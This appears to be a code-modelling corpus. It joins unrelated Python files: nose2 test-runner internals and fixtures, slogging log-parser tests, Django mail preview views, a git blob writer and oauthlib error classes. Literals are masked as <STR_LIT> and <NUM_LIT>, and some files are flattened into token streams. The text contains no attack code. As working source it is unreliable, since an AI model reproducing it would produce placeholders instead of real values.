            # warn rather than silently ignoring them.
            log.warn("<STR_LIT>"
                     "<STR_LIT>")

    def findConfigFiles(self, cfg_args):
        """<STR_LIT>"""
        filenames = cfg_args.config[:]
        # Project-level config files, resolved relative to the top-level
        # directory when one was given.
        proj_opts = ('<STR_LIT>', '<STR_LIT>')
        for fn in proj_opts:
            if cfg_args.top_level_directory:
                fn = os.path.abspath(
                    os.path.join(cfg_args.top_level_directory, fn))
            filenames.append(fn)
        # Optional per-user config files in the home directory.
        if cfg_args.user_config:
            user_opts = ('<STR_LIT>', '<STR_LIT>')
            for fn in user_opts:
                filenames.append(os.path.expanduser(fn))
        return filenames

    def handleArgs(self, args):
        """<STR_LIT>"""
        self.testNames = args.testNames
        self.session.hooks.handleArgs(events.CommandLineArgsEvent(args=args))

    def loadPlugins(self):
        """<STR_LIT>"""
        self.session.loadPlugins(self.defaultPlugins, self.excludePlugins)
        # extraHooks entries are (method_name, plugin) pairs registered
        # directly with the hook interface.
        for method_name, plugin in self.extraHooks:
            self.session.hooks.register(method_name, plugin)

    def createTests(self):
        """<STR_LIT>"""
        event = events.CreateTestsEvent(
            self.testLoader, self.testNames, self.module)
        result = self.session.hooks.createTests(event)
        if event.handled:
            # A plugin took over test creation entirely.
            test = result
        else:
            log.debug("<STR_LIT>", self.testNames, self.module)
            test = self.testLoader.loadTestsFromNames(
                self.testNames, self.module)
        # Give plugins a chance to replace the assembled suite.
        event = events.CreatedTestSuiteEvent(test)
        result = self.session.hooks.createdTestSuite(event)
        if event.handled:
            test = result
        self.test = test

    def runTests(self):
        """<STR_LIT>"""
        runner = self._makeRunner()
        try:
            self.result = runner.run(self.test)
        except Exception as e:
            # Report the failure and honour self.exit even when the run
            # itself blew up.
            log.exception('<STR_LIT>')
            sys.stderr.write('<STR_LIT>' % (e))
            if self.exit:
                sys.exit(<NUM_LIT:1>)
        if self.exit:
            sys.exit(not self.result.wasSuccessful())

    def _makeRunner(self):
        # Build the runner, letting plugins swap in a replacement.
        runner = self.runnerClass(self.session)
        event = events.RunnerCreatedEvent(runner)
        self.session.hooks.runnerCreated(event)
        self.session.testRunner = event.runner
        return event.runner

    @classmethod
    def getCurrentSession(cls):
        """<STR_LIT>"""
        return cls._currentSession


main = PluggableTestProgram


def discover(*args, **kwargs):
    """<STR_LIT>"""
    # Force module to None so test discovery is used instead of loading
    # from a specific module.
    kwargs['<STR_LIT>'] = None
    return main(*args, **kwargs)
</s>
<s>
import logging
import os
import argparse

from six.moves import configparser

from nose2 import config, events, util

log = logging.getLogger(__name__)
__unittest = True


class Session(object):
    """<STR_LIT>"""
    configClass = config.Config

    def __init__(self):
        # add_help=False: the enclosing test program owns -h/--help.
        self.argparse = argparse.ArgumentParser(prog='<STR_LIT>', add_help=False)
        self.pluginargs = self.argparse.add_argument_group(
            '<STR_LIT>',
            '<STR_LIT>')
        self.config = configparser.ConfigParser()
        self.hooks = events.PluginInterface()
        self.plugins = []
        self.verbosity = <NUM_LIT:1>
        self.startDir = None
        self.topLevelDir = None
        self.testResult = None
        self.testLoader = None
        self.logLevel = logging.WARN

    def get(self, section):
        """<STR_LIT>"""
        items = []
        if self.config.has_section(section):
            items = self.config.items(section)
        # Wrap the raw (key, value) pairs in the config helper class.
        return self.configClass(items)

    def loadConfigFiles(self, *filenames):
        """<STR_LIT>"""
        # ConfigParser.read silently skips files that do not exist.
        self.config.read(filenames)

    def loadPlugins(self, modules=None, exclude=None):
        """<STR_LIT>"""
        if modules is None:
            modules = []
        if exclude is None:
            exclude = []
        cfg = self.unittest
        # Merge plugins/exclusions from config with those passed in.
        more_plugins = cfg.as_list('<STR_LIT>', [])
        cfg_exclude = cfg.as_list('<STR_LIT>', [])
        exclude.extend(cfg_exclude)
        exclude = set(exclude)
        all_ = (set(modules) | set(more_plugins)) - exclude
        log.debug("<STR_LIT>", all_)
        for module in all_:
            self.loadPluginsFromModule(util.module_from_name(module))
        self.hooks.pluginsLoaded(events.PluginsLoadedEvent(self.plugins))

    def loadPluginsFromModule(self, module):
        """<STR_LIT>"""
        avail = []
        for entry in dir(module):
            try:
                item = getattr(module, entry)
            except AttributeError:
                pass
            try:
                # Collect Plugin subclasses only; issubclass raises
                # TypeError for non-class attributes, which we skip.
                if issubclass(item, events.Plugin):
                    avail.append(item)
            except TypeError:
                pass
        for cls in avail:
            log.debug("<STR_LIT>", cls)
            plugin = cls(session=self)
            self.plugins.append(plugin)
            # Pre-registration hooks fire before normal registration.
            for method in self.hooks.preRegistrationMethods:
                if hasattr(plugin, method):
                    self.hooks.register(method, plugin)

    def registerPlugin(self, plugin):
        """<STR_LIT>"""
        log.debug("<STR_LIT>", plugin)
        if plugin not in self.plugins:
            self.plugins.append(plugin)
        # Hook the plugin into every interface method it implements.
        for method in self.hooks.methods:
            if hasattr(plugin, method):
                log.debug("<STR_LIT>", method, plugin)
                self.hooks.register(method, plugin)

    def setStartDir(self):
        # Fall back to the configured (or default) start directory.
        if self.startDir is None:
            self.startDir = self.unittest.as_str('<STR_LIT>', '<STR_LIT:.>')

    def prepareSysPath(self):
        """<STR_LIT>"""
        tld = self.topLevelDir
        sd = self.startDir
        if tld is None:
            tld = sd
        tld = os.path.abspath(tld)
        util.ensure_importable(tld)
        # Also make configured library dirs (relative to the top level)
        # importable when they exist.
        for libdir in self.libDirs:
            libdir = os.path.abspath(os.path.join(tld, libdir))
            if os.path.exists(libdir):
                util.ensure_importable(libdir)

    @property
    def libDirs(self):
        return self.unittest.as_list('<STR_LIT>', ['<STR_LIT>', '<STR_LIT:src>'])

    @property
    def testFilePattern(self):
        return self.unittest.as_str('<STR_LIT>', '<STR_LIT>')

    @property
    def testMethodPrefix(self):
        return self.unittest.as_str('<STR_LIT>', '<STR_LIT:test>')

    @property
    def unittest(self):
        # The main config section shared by core and plugins.
        return self.get('<STR_LIT>')

    def isPluginLoaded(self, pluginName):
        """<STR_LIT>"""
        # Plugins are identified by the module they were defined in.
        for plugin in self.plugins:
            if pluginName == plugin.__class__.__module__:
                return True
        return False
</s>
<s> from nose2 . compat import unittest <EOL> class Layer ( object ) : <EOL> description = '<STR_LIT>' <EOL> @ classmethod <EOL> def setUp ( cls ) : <EOL> cls . value = <NUM_LIT:1> <EOL> class Test ( unittest . TestCase ) : <EOL> layer = Layer <EOL> def test_ok ( self ) : <EOL> self . assertEqual ( self . layer . value , <NUM_LIT:1> ) <EOL> def test_fail ( self ) : <EOL> self . assertEqual ( self . layer . value , <NUM_LIT:2> ) <EOL> def test_err ( self ) : <EOL> self . assertEqual ( self . layer . mulch , '<STR_LIT>' ) </s>
<s> class Test ( object ) : <EOL> def test ( self ) : <EOL> pass <EOL> def test_gen ( self ) : <EOL> def check ( a ) : <EOL> pass <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:5> ) : <EOL> yield check , i <EOL> def test_params ( self , a ) : <EOL> pass <EOL> test_params . paramList = ( <NUM_LIT:1> , <NUM_LIT:2> ) </s>
<s> import re <EOL> from nose2 . tests . _common import FunctionalTestCase <EOL> class TestPrintHooksPlugin ( FunctionalTestCase ) : <EOL> def test_invocation_by_double_dash_option ( self ) : <EOL> proc = self . runIn ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> match = re . compile ( "<STR_LIT:\n>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assertTestRunOutputMatches ( proc , stderr = match ) <EOL> self . assertEqual ( proc . poll ( ) , <NUM_LIT:0> ) <EOL> def test_invocation_by_single_dash_option ( self ) : <EOL> proc = self . runIn ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> match = re . compile ( "<STR_LIT:\n>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assertTestRunOutputMatches ( proc , stderr = match ) <EOL> self . assertEqual ( proc . poll ( ) , <NUM_LIT:0> ) <EOL> def test_nested_hooks_are_indented ( self ) : <EOL> proc = self . runIn ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> match = re . compile ( "<STR_LIT>" ) <EOL> self . assertTestRunOutputMatches ( proc , stderr = match ) <EOL> self . assertEqual ( proc . poll ( ) , <NUM_LIT:0> ) </s>
<s> from nose2 . tests . _common import TestCase <EOL> from nose2 . plugins . loader . testcases import TestCaseLoader <EOL> from nose2 import events , loader , session <EOL> class TestTestCaseLoader ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . session = session . Session ( ) <EOL> self . loader = loader . PluggableTestLoader ( session = self . session ) <EOL> self . plugin = TestCaseLoader ( session = self . session ) <EOL> class Mod ( object ) : <EOL> pass <EOL> self . module = Mod ( ) <EOL> class A ( TestCase ) : <EOL> def test ( self ) : <EOL> pass <EOL> class B ( TestCase ) : <EOL> def runTest ( self ) : <EOL> pass <EOL> class C ( TestCase ) : <EOL> def foo ( self ) : <EOL> pass <EOL> class Test ( object ) : <EOL> def test ( self ) : <EOL> pass <EOL> self . module . A = A <EOL> self . module . B = B <EOL> self . module . C = C <EOL> self . module . Test = Test <EOL> def test_can_find_testcases_in_module ( self ) : <EOL> event = events . LoadFromModuleEvent ( self . loader , self . module ) <EOL> result = self . session . hooks . loadTestsFromModule ( event ) <EOL> self . assertEqual ( result , None ) <EOL> self . assertEqual ( len ( event . extraTests ) , <NUM_LIT:3> ) <EOL> self . assertEqual ( len ( event . extraTests [ <NUM_LIT:0> ] . _tests ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( event . extraTests [ <NUM_LIT:1> ] . _tests ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( event . extraTests [ <NUM_LIT:2> ] . _tests ) , <NUM_LIT:0> ) <EOL> def test_get_testcase_names_can_override_name_selection ( self ) : <EOL> class FooIsOnlyTest ( events . Plugin ) : <EOL> def getTestCaseNames ( self , event ) : <EOL> event . handled = True <EOL> return [ '<STR_LIT:foo>' ] if '<STR_LIT:foo>' in dir ( event . testCase ) else [ ] <EOL> foo = FooIsOnlyTest ( session = self . session ) <EOL> foo . register ( ) <EOL> event = events . LoadFromModuleEvent ( self . loader , self . module ) <EOL> result = self . session . hooks . 
loadTestsFromModule ( event ) <EOL> self . assertEqual ( result , None ) <EOL> self . assertEqual ( len ( event . extraTests ) , <NUM_LIT:3> ) <EOL> self . assertEqual ( len ( event . extraTests [ <NUM_LIT:0> ] . _tests ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( event . extraTests [ <NUM_LIT:1> ] . _tests ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( event . extraTests [ <NUM_LIT:2> ] . _tests ) , <NUM_LIT:1> ) <EOL> def test_plugins_can_exclude_test_names ( self ) : <EOL> class Excluder ( events . Plugin ) : <EOL> def getTestCaseNames ( self , event ) : <EOL> event . excludedNames . append ( '<STR_LIT:test>' ) <EOL> excl = Excluder ( session = self . session ) <EOL> excl . register ( ) <EOL> event = events . LoadFromModuleEvent ( self . loader , self . module ) <EOL> result = self . session . hooks . loadTestsFromModule ( event ) <EOL> self . assertEqual ( result , None ) <EOL> self . assertEqual ( len ( event . extraTests ) , <NUM_LIT:3> ) <EOL> self . assertEqual ( len ( event . extraTests [ <NUM_LIT:0> ] . _tests ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( event . extraTests [ <NUM_LIT:1> ] . _tests ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( event . extraTests [ <NUM_LIT:2> ] . _tests ) , <NUM_LIT:0> ) </s>
<s> import unittest <EOL> from slogging import access_processor <EOL> class TestAccessProcessor ( unittest . TestCase ) : <EOL> def test_CIDR_works ( self ) : <EOL> if access_processor . CIDR_support : <EOL> p = access_processor . AccessLogProcessor ( { '<STR_LIT>' : <EOL> '<STR_LIT>' } ) <EOL> self . assertTrue ( '<STR_LIT>' in p . lb_private_ips ) <EOL> self . assertTrue ( '<STR_LIT:127.0.0.1>' in p . lb_private_ips ) <EOL> self . assertFalse ( '<STR_LIT>' in p . lb_private_ips ) <EOL> else : <EOL> from nose import SkipTest <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> def test_CIDR_process_logs_with_missing_ip ( self ) : <EOL> if access_processor . CIDR_support : <EOL> p = access_processor . AccessLogProcessor ( { '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> line = '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' <EOL> stream = [ line ] <EOL> res = p . process ( stream , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEquals ( res . keys ( ) [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , '<STR_LIT:a>' ) <EOL> else : <EOL> from nose import SkipTest <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> def test_log_line_parser_query_args ( self ) : <EOL> p = access_processor . AccessLogProcessor ( { } ) <EOL> log_line = [ str ( x ) for x in range ( <NUM_LIT> ) ] <EOL> log_line [ <NUM_LIT:1> ] = '<STR_LIT>' <EOL> log_line [ <NUM_LIT:4> ] = '<STR_LIT>' <EOL> query = '<STR_LIT:foo>' <EOL> for param in access_processor . LISTING_PARAMS : <EOL> query += '<STR_LIT>' % param <EOL> log_line [ <NUM_LIT:6> ] = '<STR_LIT>' % query <EOL> log_line = '<STR_LIT:x>' * <NUM_LIT:16> + '<STR_LIT:U+0020>' . join ( log_line ) <EOL> res = p . 
log_line_parser ( log_line ) <EOL> expected = { '<STR_LIT:code>' : <NUM_LIT:8> , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:3>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:object_name>' : '<STR_LIT:o>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:5>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : '<STR_LIT:c>' , '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:5>' , '<STR_LIT>' : '<STR_LIT:a>' , '<STR_LIT>' : '<STR_LIT:4>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:12> , '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : None } <EOL> for param in access_processor . LISTING_PARAMS : <EOL> expected [ param ] = <NUM_LIT:1> <EOL> expected [ '<STR_LIT>' ] = query <EOL> self . assertEquals ( res , expected ) <EOL> def test_log_line_parser_query_args_with_slash_delimiter_to_container ( self ) : <EOL> p = access_processor . AccessLogProcessor ( { } ) <EOL> log_line = [ str ( x ) for x in range ( <NUM_LIT> ) ] <EOL> log_line [ <NUM_LIT:1> ] = '<STR_LIT>' <EOL> log_line [ <NUM_LIT:4> ] = '<STR_LIT>' <EOL> query = '<STR_LIT>' <EOL> log_line [ <NUM_LIT:6> ] = '<STR_LIT>' % query <EOL> log_line = '<STR_LIT:x>' * <NUM_LIT:16> + '<STR_LIT:U+0020>' . join ( log_line ) <EOL> res = p . log_line_parser ( log_line ) <EOL> self . assertEquals ( res [ '<STR_LIT:object_name>' ] , None ) <EOL> self . assertEquals ( res [ '<STR_LIT>' ] , '<STR_LIT:c>' ) <EOL> self . assertEquals ( res [ '<STR_LIT>' ] , '<STR_LIT:a>' ) <EOL> self . assertEquals ( res [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEquals ( res [ '<STR_LIT>' ] , query ) <EOL> def test_log_line_parser_query_args_with_slash_delimiter_to_account ( self ) : <EOL> p = access_processor . 
AccessLogProcessor ( { } ) <EOL> log_line = [ str ( x ) for x in range ( <NUM_LIT> ) ] <EOL> log_line [ <NUM_LIT:1> ] = '<STR_LIT>' <EOL> log_line [ <NUM_LIT:4> ] = '<STR_LIT>' <EOL> query = '<STR_LIT>' <EOL> log_line [ <NUM_LIT:6> ] = '<STR_LIT>' % query <EOL> log_line = '<STR_LIT:x>' * <NUM_LIT:16> + '<STR_LIT:U+0020>' . join ( log_line ) <EOL> res = p . log_line_parser ( log_line ) <EOL> self . assertEquals ( res [ '<STR_LIT:object_name>' ] , None ) <EOL> self . assertEquals ( res [ '<STR_LIT>' ] , None ) <EOL> self . assertEquals ( res [ '<STR_LIT>' ] , '<STR_LIT:a>' ) <EOL> self . assertEquals ( res [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEquals ( res [ '<STR_LIT>' ] , query ) <EOL> def test_log_line_parser_field_count ( self ) : <EOL> p = access_processor . AccessLogProcessor ( { } ) <EOL> log_line = [ str ( x ) for x in range ( <NUM_LIT> ) ] <EOL> log_line [ <NUM_LIT:1> ] = '<STR_LIT>' <EOL> log_line [ <NUM_LIT:4> ] = '<STR_LIT>' <EOL> log_line [ <NUM_LIT:6> ] = '<STR_LIT>' <EOL> log_line = '<STR_LIT:x>' * <NUM_LIT:16> + '<STR_LIT:U+0020>' . join ( log_line ) <EOL> res = p . log_line_parser ( log_line ) <EOL> expected = { } <EOL> self . assertEquals ( res , expected ) <EOL> log_line = [ str ( x ) for x in range ( <NUM_LIT> ) ] <EOL> log_line [ <NUM_LIT:1> ] = '<STR_LIT>' <EOL> log_line [ <NUM_LIT:4> ] = '<STR_LIT>' <EOL> log_line [ <NUM_LIT:6> ] = '<STR_LIT>' <EOL> log_line = '<STR_LIT:x>' * <NUM_LIT:16> + '<STR_LIT:U+0020>' . join ( log_line ) <EOL> res = p . 
log_line_parser ( log_line ) <EOL> expected = { '<STR_LIT:code>' : <NUM_LIT:8> , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:3>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:object_name>' : '<STR_LIT:o>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:5>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : '<STR_LIT:c>' , '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:5>' , '<STR_LIT>' : '<STR_LIT:a>' , '<STR_LIT>' : '<STR_LIT:4>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:12> , '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : None } <EOL> self . assertEquals ( res , expected ) <EOL> log_line = [ str ( x ) for x in range ( <NUM_LIT> ) ] <EOL> log_line [ <NUM_LIT:1> ] = '<STR_LIT>' <EOL> log_line [ <NUM_LIT:4> ] = '<STR_LIT>' <EOL> log_line [ <NUM_LIT:6> ] = '<STR_LIT>' <EOL> log_line = '<STR_LIT:x>' * <NUM_LIT:16> + '<STR_LIT:U+0020>' . join ( log_line ) <EOL> res = p . 
log_line_parser ( log_line ) <EOL> expected = { '<STR_LIT:code>' : <NUM_LIT:8> , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:3>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:object_name>' : '<STR_LIT:o>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:5>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : '<STR_LIT:c>' , '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:5>' , '<STR_LIT>' : '<STR_LIT:a>' , '<STR_LIT>' : '<STR_LIT:4>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:12> , '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> self . assertEquals ( res , expected ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> from django_docusign . backend import DocuSignBackend <EOL> from django_docusign . forms import SignerForm <EOL> from django_docusign . views import SignatureCallbackView </s>
<s>
from django.shortcuts import redirect
from django.conf import settings
from django.http import Http404, HttpResponse
from django.template.base import TemplateDoesNotExist
from django.views.generic import TemplateView, FormView
from django.contrib.auth.decorators import user_passes_test
from django.contrib import messages

from . import factory, exceptions

# All mail-debug views below are restricted to superusers.
admin_required = user_passes_test(lambda x: x.is_superuser)


class MailListView(TemplateView):
    """<STR_LIT>"""
    template_name = '<STR_LIT>'

    def get_context_data(self, **kwargs):
        """<STR_LIT>"""
        data = super(MailListView, self).get_context_data(**kwargs)
        mail_list = []
        # Sort registered mails by registry key for a stable listing.
        for mail_name, mail_class in sorted(factory._registry.items(),
                                            key=lambda x: x[<NUM_LIT:0>]):
            mail_list.append((mail_name, mail_class.__name__))
        data['<STR_LIT>'] = mail_list
        return data


class MailPreviewMixin(object):

    def get_html_alternative(self, message):
        """<STR_LIT>"""
        # Invert the (content, mimetype) pairs to look up by mimetype.
        alternatives = dict((v, k) for k, v in message.alternatives)
        if '<STR_LIT>' in alternatives:
            return alternatives['<STR_LIT>']

    def get_mail_preview(self, template_name, lang, cid_to_data=False):
        """<STR_LIT>"""
        form_class = factory.get_mail_form(self.mail_name)
        # Build the form twice: once unbound to obtain its default
        # context data, then bound with that data so cleaned_data exists.
        form = form_class(mail_class=self.mail_class)
        form = form_class(form.get_context_data(), mail_class=self.mail_class)
        data = form.get_context_data()
        if form.is_valid():
            data.update(form.cleaned_data)
            data.update(form.get_preview_data())
        mail = self.mail_class(data)
        message = mail.create_email_msg([settings.ADMINS], lang=lang)
        try:
            # NOTE(review): cid_to_data is hard-coded to True here,
            # ignoring this method's cid_to_data parameter — confirm
            # whether the parameter should be forwarded instead.
            message.html = factory.get_html_for(self.mail_name, data,
                                                lang=lang, cid_to_data=True)
        except TemplateDoesNotExist:
            # No HTML template registered for this mail.
            message.html = False
        return message


class MailFormView(MailPreviewMixin, FormView):
    template_name = '<STR_LIT>'

    def dispatch(self, request, mail_name):
        self.mail_name = mail_name
        try:
            self.mail_class = factory.get_mail_class(self.mail_name)
        except exceptions.MailFactoryError:
            raise Http404
        # Record which submit button was pressed and the optional
        # recipient address from the POST data.
        self.raw = '<STR_LIT>' in request.POST
        self.send = '<STR_LIT>' in request.POST
        self.email = request.POST.get('<STR_LIT:email>')
        return super(MailFormView, self).dispatch(request)

    def get_form_kwargs(self):
        kwargs = super(MailFormView, self).get_form_kwargs()
        kwargs['<STR_LIT>'] = self.mail_class
        return kwargs

    def get_form_class(self):
        return factory.get_mail_form(self.mail_name)

    def form_valid(self, form):
        if self.raw:
            # Show the raw generated message source.
            return HttpResponse('<STR_LIT>' %
                                factory.get_raw_content(
                                    self.mail_name,
                                    [settings.DEFAULT_FROM_EMAIL],
                                    form.cleaned_data).message())
        if self.send:
            # Actually send the mail to the address entered in the form.
            factory.mail(self.mail_name, [self.email], form.cleaned_data)
            messages.success(self.request,
                             '<STR_LIT>' % (self.mail_name,
                                            self.email))
            return redirect('<STR_LIT>')
        # Default action: render the HTML preview with submitted data.
        data = None
        if form:
            data = form.get_context_data()
            if hasattr(form, '<STR_LIT>'):
                data.update(form.cleaned_data)
        try:
            html = factory.get_html_for(self.mail_name, data,
                                        cid_to_data=True)
        except TemplateDoesNotExist:
            return redirect('<STR_LIT>',
                            mail_name=self.mail_name)
        return HttpResponse(html)

    def get_context_data(self, **kwargs):
        data = super(MailFormView, self).get_context_data(**kwargs)
        data['<STR_LIT>'] = self.mail_name
        preview_messages = {}
        # Render a preview message for every configured language.
        for lang_code, lang_name in settings.LANGUAGES:
            message = self.get_mail_preview(self.mail_name, lang_code)
            preview_messages[lang_code] = message
        data['<STR_LIT>'] = preview_messages
        return data


class HTMLNotFoundView(TemplateView):
    """<STR_LIT>"""
    template_name = '<STR_LIT>'


class MailPreviewMessageView(MailPreviewMixin, TemplateView):
    template_name = '<STR_LIT>'

    def dispatch(self, request, mail_name, lang):
        self.mail_name = mail_name
        self.lang = lang
        try:
            self.mail_class = factory.get_mail_class(self.mail_name)
        except exceptions.MailFactoryError:
            raise Http404
        return super(MailPreviewMessageView, self).dispatch(request)

    def get_context_data(self, **kwargs):
        data = super(MailPreviewMessageView, self).get_context_data(**kwargs)
        message = self.get_mail_preview(self.mail_name, self.lang)
        data['<STR_LIT>'] = self.mail_name
        data['<STR_LIT:message>'] = message
        return data


# URL entry points, all superuser-only.
mail_list = admin_required(MailListView.as_view())
form = admin_required(MailFormView.as_view())
html_not_found = admin_required(HTMLNotFoundView.as_view())
preview_message = admin_required(MailPreviewMessageView.as_view())
</s>
<s> from django import forms <EOL> from complaints . models import Complaint <EOL> class ComplaintForm ( forms . ModelForm ) : <EOL> def save ( self , request = None , * args , ** kwargs ) : <EOL> kwargs [ '<STR_LIT>' ] = False <EOL> obj = super ( ComplaintForm , self ) . save ( * args , ** kwargs ) <EOL> obj . save ( request ) <EOL> return obj <EOL> class Meta : <EOL> model = Complaint <EOL> exclude = ( '<STR_LIT>' , '<STR_LIT>' , ) </s>
<s> import os , sys , sha , zlib <EOL> content = sys . stdin . read ( ) <EOL> type = '<STR_LIT>' <EOL> object = '<STR_LIT>' % ( type , len ( content ) , content ) <EOL> sha1sum = sha . new ( object ) . hexdigest ( ) <EOL> container = '<STR_LIT>' % sha1sum [ : <NUM_LIT:2> ] <EOL> if not os . path . exists ( container ) : <EOL> os . mkdir ( container ) <EOL> open ( '<STR_LIT>' % ( container , sha1sum [ <NUM_LIT:2> : ] ) , '<STR_LIT:w>' ) . write ( zlib . compress ( object ) ) <EOL> print sha1sum </s>
<s>
"""<STR_LIT>"""
from __future__ import unicode_literals
import json

from oauthlib.common import urlencode, add_params_to_uri


class OAuth2Error(Exception):
    # Subclasses override these to carry their RFC 6749 error code,
    # HTTP status and human-readable description.
    error = None
    status_code = <NUM_LIT>
    description = '<STR_LIT>'

    def __init__(self, description=None, uri=None, state=None, status_code=None,
                 request=None):
        """<STR_LIT>"""
        self.description = description or self.description
        message = '<STR_LIT>' % (self.error, self.description)
        if request:
            message += '<STR_LIT:U+0020>' + repr(request)
        super(OAuth2Error, self).__init__(message)
        self.uri = uri
        self.state = state
        if status_code:
            self.status_code = status_code
        if request:
            # Copy request details so the error can be serialised or
            # redirected without holding on to the request itself.
            self.redirect_uri = request.redirect_uri
            self.client_id = request.client_id
            self.scopes = request.scopes
            self.response_type = request.response_type
            self.grant_type = request.grant_type
            if not state:
                self.state = request.state

    def in_uri(self, uri):
        # Append the error parameters to an existing URI (for redirects).
        return add_params_to_uri(uri, self.twotuples)

    @property
    def twotuples(self):
        # The error payload as (key, value) pairs; optional parts are
        # appended only when set.
        error = [('<STR_LIT:error>', self.error)]
        if self.description:
            error.append(('<STR_LIT>', self.description))
        if self.uri:
            error.append(('<STR_LIT>', self.uri))
        if self.state:
            error.append(('<STR_LIT:state>', self.state))
        return error

    @property
    def urlencoded(self):
        return urlencode(self.twotuples)

    @property
    def json(self):
        return json.dumps(dict(self.twotuples))


class TokenExpiredError(OAuth2Error):
    error = '<STR_LIT>'


class InsecureTransportError(OAuth2Error):
    error = '<STR_LIT>'
    description = '<STR_LIT>'


class MismatchingStateError(OAuth2Error):
    error = '<STR_LIT>'
    description = '<STR_LIT>'


class MissingCodeError(OAuth2Error):
    error = '<STR_LIT>'


class MissingTokenError(OAuth2Error):
    error = '<STR_LIT>'


class MissingTokenTypeError(OAuth2Error):
    error = '<STR_LIT>'


class FatalClientError(OAuth2Error):
    """<STR_LIT>"""
    pass


class InvalidRedirectURIError(FatalClientError):
    error = '<STR_LIT>'


class MissingRedirectURIError(FatalClientError):
    error = '<STR_LIT>'


class MismatchingRedirectURIError(FatalClientError):
    error = '<STR_LIT>'


class MissingClientIdError(FatalClientError):
    error = '<STR_LIT>'


class InvalidClientIdError(FatalClientError):
    error = '<STR_LIT>'


class InvalidRequestError(OAuth2Error):
    """<STR_LIT>"""
    error = '<STR_LIT>'


class AccessDeniedError(OAuth2Error):
    """<STR_LIT>"""
    error = '<STR_LIT>'
    status_code = <NUM_LIT>


class UnsupportedResponseTypeError(OAuth2Error):
    """<STR_LIT>"""
    error = '<STR_LIT>'


class InvalidScopeError(OAuth2Error):
    """<STR_LIT>"""
    error = '<STR_LIT>'
    status_code = <NUM_LIT>


class ServerError(OAuth2Error):
    """<STR_LIT>"""
    error = '<STR_LIT>'


class TemporarilyUnavailableError(OAuth2Error):
    """<STR_LIT>"""
    error = '<STR_LIT>'


class InvalidClientError(OAuth2Error):
    """<STR_LIT>"""
    error = '<STR_LIT>'
    status_code = <NUM_LIT>


class InvalidGrantError(OAuth2Error):
    """<STR_LIT>"""
